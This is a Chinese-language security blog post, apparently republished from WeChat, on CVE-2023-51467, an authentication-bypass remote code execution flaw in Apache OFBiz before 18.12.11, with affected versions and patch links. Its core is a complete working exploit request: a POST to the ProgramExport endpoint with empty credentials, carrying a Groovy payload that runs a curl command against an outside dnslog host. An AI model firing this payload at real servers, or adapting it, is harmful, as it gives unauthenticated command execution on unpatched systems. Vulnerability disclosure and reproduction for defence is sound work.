CVE-2023-51467RCE漏洞(附EXP)
2023-12-30 13:48:4 Author: 渗透Xiao白帽(查看原文) 阅读量:13 收藏

网安引领时代,弥天点亮未来   

0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。

Apache OFBiz 18.12.11之前版本存在代码问题漏洞,该漏洞源于允许攻击者绕过身份验证来实现服务器端请求伪造。

0x02影响版本

Apache Ofbiz <18.12.11

0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现

 POC (POST)

漏洞复现

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: 127.0.0.1Content-Length: 190Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36

groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22curl%2008hw60.dnslog.cn%22.execute%28%29%27%29

测试dnslog(漏洞存在)

3.xpoc工具测试(漏洞存在)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://lists.apache.org/thread/9tmf9qyyhgh6m052rhz7lg9vxn390bdvhttps://mp.weixin.qq.com/s/A0pwnvbJ44mlm3E1JoFVBA

文章来源: http://mp.weixin.qq.com/s?__biz=MzI1NTM4ODIxMw==&mid=2247500365&idx=1&sn=33f7d1cf216b18cb8292b83d7a35a1dd&chksm=eb94170dda7f1c27b8de7a08e08bea5c53be340694dae85fa4c5b6c9e6717ab2e5883a7fb6b4&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh